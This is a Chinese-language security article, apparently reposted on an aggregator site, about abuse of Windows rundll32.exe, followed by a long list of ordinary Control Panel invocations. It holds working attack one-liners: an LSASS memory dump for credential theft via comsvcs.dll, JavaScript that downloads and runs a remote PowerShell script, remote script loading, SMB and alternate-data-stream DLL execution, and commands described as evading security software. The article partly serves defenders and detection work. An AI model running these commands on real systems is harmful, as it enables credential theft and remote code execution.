惡意軟件作者通常會(huì)編寫(xiě)惡意軟件模仿合法的Windows進(jìn)程。因此，我們可能會(huì)看到惡意軟件偽裝成svchost.exe、rundll32.exe或lsass.exe進(jìn)程，攻擊者利用的就是大多數(shù)Windows用戶(hù)可能都不清楚這些系統(tǒng)進(jìn)程在正常情況下的行為特征。在這篇文章中，我們將深挖rundll32.exe，以期對(duì)其有所了解。

• 關(guān)于 Rundll.exe

顧名思義，rundll32.exe可執(zhí)行文件是用于運(yùn)行DLL（RUN DLL），即運(yùn)行動(dòng)態(tài)鏈接庫(kù)的。

在MSDN中，對(duì)DLL的定義如下：

動(dòng)態(tài)鏈接庫(kù)（DLL）是一個(gè)模塊，其中包含可以由另一個(gè)模塊（應(yīng)用程序或DLL）使用的函數(shù)和數(shù)據(jù)。

以下是使用rundll32.exe的最基本語(yǔ)法：

• rundll32

rundll32.exe可執(zhí)行文件可以是子進(jìn)程，也可以是父進(jìn)程，具體要取決于執(zhí)行的上下文。為了確定一個(gè)rundll32.exe實(shí)例是否屬于惡意，我們需要確認(rèn)幾件事。首先，需要確認(rèn)啟動(dòng)它的路徑，其次是命令行。

合法的RUNDLL32.EXE進(jìn)程始終位于：

\Windows\System32\rundll32.exe

\Windows\SysWOW64\rundll32.exe（64位系統(tǒng)上的32位版本）

至于rundll32.exe實(shí)例的命令行，完全取決于要運(yùn)行的內(nèi)容，例如CPL文件、DLL安裝等等。

下面我們將詳細(xì)介紹一系列 rundll32.exe 調(diào)用和對(duì)應(yīng)的作用。

案例：

• SHELL32.DLL – “OpenAs_RunDLL”

Rundll32.exe還可以執(zhí)行DLL中的特定函數(shù)。例如，當(dāng)選擇一個(gè)文件并右鍵單擊時(shí)，將會(huì)顯示出一個(gè)上下文菜單，其中包含多個(gè)選項(xiàng)。這里的一個(gè)選項(xiàng)是“OpenWith”（打開(kāi)方式）。在點(diǎn)擊后，將會(huì)出現(xiàn)一個(gè)彈出窗口，可以從系統(tǒng)上安裝的應(yīng)用程序中進(jìn)行選擇。

在此過(guò)程的背后，是使用 shell32.dll 和 OpenAs_RunDL 函數(shù)啟動(dòng) rundll32.exe 實(shí)用程序，實(shí)際上就相當(dāng)于在后臺(tái)執(zhí)行了以下命令：

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL < file_path >

拿修改 hosts 文件舉個(gè)例子，通過(guò) WIN+R 執(zhí)行以下命令，即可彈出該選擇窗口：

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\Windows\System32\drivers\etc\hosts

這種在DLL中調(diào)用特定函數(shù)的行為非常普遍，因此我們恐怕無(wú)法將所有函數(shù)都了解全面。

---

• SHELL32.DLL – “Control_RunDLL”

我們發(fā)現(xiàn)與shell32.dll一起使用的另一個(gè)常見(jiàn)函數(shù)是Control_RunDLL或Control_RunDLLAsUser。這兩個(gè)函數(shù)用于運(yùn)行.CPL文件或控制面板選項(xiàng)。

例如，如果我們要更改計(jì)算機(jī)的日期和時(shí)間，可以從控制面板啟動(dòng)對(duì)應(yīng)的applet。

在后臺(tái)，Windows實(shí)際上是使用以下命令行啟動(dòng)了rundll32.exe實(shí)例。

C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\timedate.cpl

打開(kāi)防火墻：

C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\firewall.cpl

很顯然，這里的 CPL 文件也可以被替換成惡意文件，所以一旦出現(xiàn)可疑的路徑及文件名，我們就需要結(jié)合其它工具來(lái)檢查它的合法性。

除了檢查.CPL文件外，在使用 Control_RunDLL 或 Control_RunDLLAsUser 函數(shù)時(shí)，應(yīng)該一并檢查所指向的.DLL文件合法性。

---

• DLL文件的調(diào)用

攻擊者如果使用合法的 DLL 文件來(lái)完成攻擊活動(dòng)，按照傳統(tǒng)的檢測(cè)手段，確實(shí)會(huì)大大增加防守難度，例如利用 comsvcs.dll 中的 MiniDump 函數(shù)對(duì)目標(biāo)進(jìn)程進(jìn)行內(nèi)存轉(zhuǎn)儲(chǔ)，從而實(shí)現(xiàn)憑證竊取，參考這里：

C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\lsass.dmp full

類(lèi)似的還有 advpack.dll，原本是用于幫助硬件和軟件讀取和驗(yàn)證.INF文件，也會(huì)被攻擊者用做代碼執(zhí)行，參考這里：

c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection c:\360\360.png,DefaultInstall

當(dāng)然，這些攻擊手法在實(shí)際使用過(guò)程中肯定會(huì)有許多變種，用于繞過(guò)一些常規(guī)的檢測(cè)方式，比如 MiniDump 函數(shù)的調(diào)用也可以通過(guò)編號(hào) #24 完成，感興趣的朋友可以看看這里：

---

• 從 SMB 共享執(zhí)行 DLL

rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint

使用 Rundll32.exe 從 SMB 共享執(zhí)行 DLL。EntryPoint 是 .DLL 文件中要執(zhí)行的入口點(diǎn)的名稱(chēng)。

用例：從 SMB 共享執(zhí)行 DLL。
所需權(quán)限： 用戶(hù)
操作系統(tǒng)：Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11

---

• 執(zhí)行 JavaScript 腳本

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://www.chwm.vip/?javascript');")

使用 Rundll32.exe 執(zhí)行 JavaScript 腳本，該腳本運(yùn)行從以下位置下載的 PowerShell 腳本一個(gè)遠(yuǎn)程網(wǎng)站。

用例：從 Internet 執(zhí)行代碼
所需權(quán)限： 用戶(hù)
操作系統(tǒng)：Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11

---

• 執(zhí)行運(yùn)行外部程序

rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");

使用 Rundll32.exe 執(zhí)行運(yùn)行 calc 的 JavaScript 腳本。EXE文件。

用例：代理執(zhí)行
所需權(quán)限： 用戶(hù)
操作系統(tǒng)：Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11

---

• 執(zhí)行運(yùn)行外部程序并殺死 rundll32.exe 進(jìn)程

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

使用 Rundll32.exe 執(zhí)行運(yùn)行 calc.exe 的 JavaScript 腳本并殺死啟動(dòng)的 Rundll32.exe 進(jìn)程。

用例：代理執(zhí)行
所需權(quán)限： 用戶(hù)
操作系統(tǒng)：Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11

---

• 執(zhí)行調(diào)用遠(yuǎn)程 JavaScript 腳本

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://www.chwm.vip/test/test.js")

使用 Rundll32.exe 執(zhí)行調(diào)用遠(yuǎn)程 JavaScript 的 JavaScript 腳本。

用例：從 Internet 執(zhí)行代碼
所需權(quán)限： 用戶(hù)
操作系統(tǒng)：Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11

---

• 執(zhí)行 VBScript 腳本代碼

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";window.execScript("msgbox('a')","vbs");window.close()

使用 Rundll32.exe 執(zhí)行調(diào)用 VBScript 腳本。

用例：代理執(zhí)行
所需權(quán)限： 用戶(hù)
操作系統(tǒng)：Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11

---

• 加載已注冊(cè)或劫持的 COM 服務(wù)器

rundll32.exe –localserver < CLSID_GUID >
rundll32.exe –sta < CLSID_GUID >

使用 Rundll32.exe 加載已注冊(cè)或劫持的 COM 服務(wù)器有效負(fù)載。也適用于 ProgID。

二者均可以用于加載惡意注冊(cè)的COM對(duì)象。

需要驗(yàn)證相應(yīng)的注冊(cè)表項(xiàng)\HKEY_CLASSES_ROOT\CLSID\

推薦大家閱讀以下文章，以詳細(xì)了解這種技術(shù)。

https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/

---

• 執(zhí)行命令繞過(guò)安全軟件

rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
 
rundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exe
 
rundll32 url.dll, FileProtocolHandler calc.exe

這是經(jīng)過(guò)反匯編分析 Url.dll 得出的結(jié)果，可以成功繞開(kāi)大部分安全軟件。

用例：代理執(zhí)行
所需權(quán)限： 用戶(hù)
操作系統(tǒng)：Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11

---

• 備用數(shù)據(jù)流

rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain

使用 Rundll32.exe 執(zhí)行存儲(chǔ)在備用數(shù)據(jù)流 (ADS) 中的 .DLL 文件。

用例：從備用數(shù)據(jù)流執(zhí)行代碼
所需權(quán)限： 用戶(hù)
操作系統(tǒng)：Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11

---

• 執(zhí)行 HTML 代碼

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication < HTML Code >

使用 Rundll32.exe 調(diào)用 mshtml.dll 運(yùn)行 HTML 代碼。

用例：代理執(zhí)行
所需權(quán)限： 用戶(hù)
操作系統(tǒng)：Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11

其他使用方法

"rundll32 shell32,Control_RunDLL" - 運(yùn)行控制面板
"rundll32 shell32,OpenAs_RunDLL" - 打開(kāi)"打開(kāi)方式"窗口
"rundll32 shell32,ShellAboutA Info-Box" - 打開(kāi)"關(guān)于"窗口
"rundll32 shell32,Control_RunDLL desk.cpl" - 打開(kāi)"顯示屬性"窗口
"rundll32 user,cascadechildwindows" - 層疊全部窗口
"rundll32 user,tilechildwindows" - 最小化所有的子窗口
"rundll32 user,repaintscreen" - 刷新桌面
"rundll32 shell,shellexecute Explorer" - 重新運(yùn)行Windows Explorer
"rundll32 keyboard,disable" - 鎖寫(xiě)鍵盤(pán)
"rundll32 mouse,disable" - 讓鼠標(biāo)失效
"rundll32 user,swapmousebutton" - 交換鼠標(biāo)按鈕
"rundll32 user,setcursorpos" - 設(shè)置鼠標(biāo)位置為(0,0)
"rundll32 user,wnetconnectdialog" - 打開(kāi)"映射網(wǎng)絡(luò)驅(qū)動(dòng)器"窗口
"rundll32 user,wnetdisconnectdialog" - 打開(kāi)"斷開(kāi)網(wǎng)絡(luò)驅(qū)動(dòng)器"窗口
"rundll32 user,disableoemlayer" - 顯示BSOD窗口, (BSOD) = Blue Screen Of Death, 即藍(lán)屏
"rundll32 diskcopy,DiskCopyRunDll" - 打開(kāi)磁盤(pán)復(fù)制窗口
"rundll32 rnaui.dll,RnaWizard" - 運(yùn)行"Internet連接向?qū)?, 如果加上參數(shù)"/1"則為silent模式
"rundll32 shell32,SHFormatDrive" - 打開(kāi)"格式化磁盤(pán)(A)"窗口
"rundll32 shell32,SHExitWindowsEx -1" - 冷啟動(dòng)Windows Explorer
"rundll32 shell32,SHExitWindowsEx 1" - 關(guān)機(jī)
"rundll32 shell32,SHExitWindowsEx 0" - 退當(dāng)前用戶(hù)
"rundll32 shell32,SHExitWindowsEx 2" Windows9x 快速重啟
"rundll32 krnl386.exe,exitkernel" - 強(qiáng)行退出Windows 9x(無(wú)確認(rèn))
"rundll rnaui.dll,RnaDial "MyConnect" - 運(yùn)行"網(wǎng)絡(luò)連接"對(duì)話框
"rundll32 msprint2.dll,RUNDLL_PrintTestPage" - 選擇打印機(jī)和打印測(cè)試頁(yè)
"rundll32 user,setcaretblinktime" - 設(shè)置光標(biāo)閃爍速度
"rundll32 user, setdoubleclicktime" - 測(cè)試鼠標(biāo)雙擊速度
"rundll32 sysdm.cpl,InstallDevice_Rundll" - 搜索非PnP設(shè)備
"rundll32.exe user.exe,restartwindows" - 重啟電腦

---

　控制面板中的各項(xiàng)功能
　winexec('rundll32.exe shell32.dll, Control_RunDLL', 9);
　{輔助選項(xiàng) 屬性-鍵盤(pán)}
　winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 1', 9);
　{輔助選項(xiàng) 屬性-聲音}
　winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 2', 9);
　{輔助選項(xiàng) 屬性-顯示}
　winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 3', 9);
　{輔助選項(xiàng) 屬性-鼠標(biāo)}
　winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 4', 9);
　{輔助選項(xiàng) 屬性-常規(guī)}
　winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 5', 9);
　{添加/刪除程序 屬性-安裝/卸載}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Appwiz.cpl, 1', 9);
　{添加/刪除程序 屬性-Windows安裝程序}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Appwiz.cpl, 2', 9);
　{添加/刪除程序 屬性-啟動(dòng)盤(pán)}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Appwiz.cpl, 3', 9);
　{顯示 屬性-背景}
　winexec('rundll32.exe shell32.dll, Control_RunDLL desk.cpl, 0', 9);　
　{顯示 屬性-屏幕保護(hù)程序}
　winexec('rundll32.exe shell32.dll, Control_RunDLL desk.cpl, 1', 9);
　{顯示 屬性-外觀}
　winexec('rundll32.exe shell32.dll, Control_RunDLL desk.cpl, 2', 9);
　{顯示 屬性-設(shè)置}
　winexec('rundll32.exe shell32.dll, Control_RunDLL desk.cpl, 3', 9);
　{Internet 屬性-常規(guī)}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 0', 9);
　{Internet 屬性-安全}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 1', 9);
　{Internet 屬性-內(nèi)容}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 2', 9);
　{Internet 屬性-連接}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 3', 9);
　{Internet 屬性-程序}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 4', 9);
　{Internet 屬性-高級(jí)}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 5', 9);
　{區(qū)域設(shè)置 屬性-區(qū)域設(shè)置}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 0', 9);
　{區(qū)域設(shè)置 屬性-數(shù)字}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 1', 9);
　{區(qū)域設(shè)置 屬性-貨幣}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 2', 9);
　{區(qū)域設(shè)置 屬性-時(shí)間}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 3', 9);
　{區(qū)域設(shè)置 屬性-日期}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 4', 9);
　winexec('rundll32.exe shell32.dll, Control_RunDLL Joy.cpl, 0', 9);
　winexec('rundll32.exe shell32.dll, Control_RunDLL Joy.cpl, 1', 9);
　{鼠標(biāo) 屬性}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Main.cpl', 9);
　{多媒體 屬性-音頻}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 0', 9);
　{多媒體 屬性-視頻}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 1', 9);
　{多媒體 屬性-MIDI}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 2', 9);
　{多媒體 屬性-CD音樂(lè)}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 3', 9);
　{多媒體 屬性-設(shè)備}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 4', 9);
　{調(diào)制解調(diào)器 屬性}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Modem.cpl', 9);
　winexec('rundll32.exe shell32.dll, Control_RunDLL Netcpl.cpl', 9);
　{密碼 屬性}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Password.cpl', 9);
　{掃描儀與數(shù)字相機(jī) 屬性}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Sticpl.cpl', 9);
　{系統(tǒng) 屬性-常規(guī)}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Sysdm.cpl, 0', 9);
　{系統(tǒng) 屬性-設(shè)備管理器}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Sysdm.cpl, 1', 9);
　{系統(tǒng) 屬性-硬件配置文件}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Sysdm.cpl, 2', 9);
　{系統(tǒng) 屬性-性能}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Sysdm.cpl, 3', 9);
　{日期/時(shí)間 屬性}
　winexec('rundll32.exe shell32.dll, Control_RunDLL timedate.cpl', 9);
　{電源管理 屬性}
　winexec('rundll32.exe shell32.dll, Control_RunDLL Powercfg.cpl', 9);

---

命令列: rundll32.exe shell32.dll,Control_RunDLL
　　功能: 顯示控制面板
　　命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1
　　功能: 顯示“控制面板－輔助選項(xiàng)－鍵盤(pán)”選項(xiàng)視窗
　　命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2
　　功能: 顯示“控制面板－輔助選項(xiàng)－聲音”選項(xiàng)視窗
　　命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3
　　功能: 顯示“控制面板－輔助選項(xiàng)－顯示”選項(xiàng)視窗
　　命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4
　　功能: 顯示“控制面板－輔助選項(xiàng)－滑鼠”選項(xiàng)視窗
　　命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5
　　功能: 顯示“控制面板－輔助選項(xiàng)－傳統(tǒng)”選項(xiàng)視窗
　　命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1
　　功能: 執(zhí)行“控制面板－添加新硬體”向?qū)А?br> 　　命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter
　　功能: 執(zhí)行“控制面板－添加新印表機(jī)”向?qū)А?br> 　　命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1
　　功能: 顯示 “控制面板－添加/刪除程式－安裝/卸載” 面板。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2
　　功能: 顯示 “控制面板－添加/刪除程式－安裝Windows” 面板。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3
　　功能: 顯示 “控制面板－添加/刪除程式－啟動(dòng)盤(pán)” 面板。
　　命令列: rundll32.exe syncui.dll,Briefcase_Create
　　功能: 在桌面上建立一個(gè)新的“我的公文包”。
　　命令列: rundll32.exe diskcopy.dll,DiskCopyRunDll
　　功能: 顯示復(fù)制軟碟視窗
　　命令列: rundll32.exe apwiz.cpl,NewLinkHere ％1
　　功能: 顯示“建立快捷方式”的對(duì)話框，所建立的快捷方式的位置由％1參數(shù)決定。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,0
　　功能: 顯示“日期與時(shí)間”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,1
　　功能: 顯示“時(shí)區(qū)”選項(xiàng)視窗。
　　命令列: rundll32.exe rnaui.dll,RnaDial [某個(gè)撥號(hào)連接的名稱(chēng)]
　　功能: 顯示某個(gè)撥號(hào)連接的撥號(hào)視窗。如果已經(jīng)撥號(hào)連接，則顯示目前的連接狀態(tài)的視窗。
　　命令列: rundll32.exe rnaui.dll,RnaWizard
　　功能: 顯示“新建撥號(hào)連接”向?qū)У囊暣啊?br> 　　命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0
　　功能: 顯示“顯示屬性－背景”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1
　　功能: 顯示“顯示屬性－螢屏保護(hù)”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2
　　功能: 顯示“顯示屬性－外觀”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3
　　功能: 顯示顯示“顯示屬性－屬性”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder
　　功能: 顯示W(wǎng)indows的“字體”檔案夾。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
　　功能: 同樣是顯示W(wǎng)indows的“字體”檔案夾。
　　命令列: rundll32.exe shell32.dll,SHformatDrive
　　功能: 顯示格式化軟碟對(duì)話框。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,0
　　功能: 顯示“控制面板－游戲控制器－一般”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,1
　　功能: 顯示“控制面板－游戲控制器－進(jìn)階”選項(xiàng)視窗。
　　命令列: rundll32.exe mshtml.dll,PrintHTML (HTML文檔)
　　功能: 列印HTML文檔。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl
　　功能: 顯示Microsoft Exchange一般選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @0
　　功能: 顯示“控制面板－滑鼠” 選項(xiàng) 。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1
　　功能: 顯示 “控制面板－鍵盤(pán)屬性－速度”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1,,1
　　功能: 顯示 “控制面板－鍵盤(pán)屬性－語(yǔ)言”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @2
　　功能: 顯示W(wǎng)indows“印表機(jī)”檔案夾。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
　　功能: 顯示W(wǎng)indows“字體”檔案夾。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @4
　　功能: 顯示“控制面板－輸入法屬性－輸入法”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL modem.cpl,,add
　　功能: 執(zhí)行“添加新調(diào)制解調(diào)器”向?qū)А?br> 　　命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0
　　功能: 顯示“控制面板－多媒體屬性－音頻”屬性頁(yè)。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1
　　功能: 顯示“控制面板－多媒體屬性－視頻”屬性頁(yè)。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2
　　功能: 顯示“控制面板－多媒體屬性－MIDI”屬性頁(yè)。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3
　　功能: 顯示“控制面板－多媒體屬性－CD音樂(lè)”屬性頁(yè)。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4
　　功能: 顯示“控制面板－多媒體屬性－設(shè)備”屬性頁(yè)。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1
　　功能: 顯示“控制面板－聲音”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl
　　功能: 顯示“控制面板－網(wǎng)路”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl
　　功能: 顯示ODBC32資料管理選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,OpenAs_RunDLL
功能: 顯示指定檔案(drive:pathfilename)的“打開(kāi)方式”對(duì)話框。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL password.cpl
　　功能: 顯示“控制面板－密碼”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl
　　功能: 顯示“控制面板－電源管理屬性”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder
　　功能: 顯示W(wǎng)indows“印表機(jī)”檔案夾。(同rundll32.exe shell32.dll,Control_RunDLL main.cpl
@2)
　　命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0
　　功能: 顯示“控制面板－區(qū)域設(shè)置屬性－區(qū)域設(shè)置”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1
　　功能: 顯示“控制面板－區(qū)域設(shè)置屬性－數(shù)字”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2
　　功能: 顯示“控制面板－區(qū)域設(shè)置屬性－貨幣”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3
　　功能: 顯示“控制面板－區(qū)域設(shè)置屬性－時(shí)間”選項(xiàng)視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4
　　功能: 顯示“控制面板－區(qū)域設(shè)置屬性－日期”選項(xiàng)視窗。
　　命令列: rundll32.exe desk.cpl,InstallScreenSaver [螢屏保護(hù)檔案名]
　　功能: 將指定的螢屏保護(hù)檔案設(shè)置為Windows的屏保，并顯示螢屏保護(hù)屬性視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0
　　功能: 顯示“控制面板－系統(tǒng)屬性－傳統(tǒng)”屬性視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1
　　功能: 顯示“控制面板－系統(tǒng)屬性－設(shè)備管理器”屬性視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2
　　功能: 顯示“控制面板－系統(tǒng)屬性－硬體配置檔案”屬性視窗。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3
　　功能: 顯示“控制面板－系統(tǒng)屬性－性能”屬性視窗。
　　命令列: rundll32.exe user.exe,restartwindows
　　功能: 強(qiáng)行關(guān)閉所有程式并重啟機(jī)器。
　　命令列: rundll32.exe user.exe,exitwindows
　　功能: 強(qiáng)行關(guān)閉所有程式并關(guān)機(jī)。
　　命令列: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl
　　功能: 顯示“撥號(hào)屬性”選項(xiàng)視窗
　　命令列: rundll32.exe shell32.dll,Control_RunDLL themes.cpl
　　功能: 顯示“桌面主旨”選項(xiàng)面板

---

總結(jié)

感謝大家的閱讀，希望能通過(guò)本篇文章對(duì) Rundll32.exe 有所了解。

Rundll32.exe 還有更多利用的方法，本文將持續(xù)更新。。。

總結(jié)

以上是生活随笔為你收集整理的深挖 Rundll32.exe 的多种“滥用方式”以及其“独特”之处的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。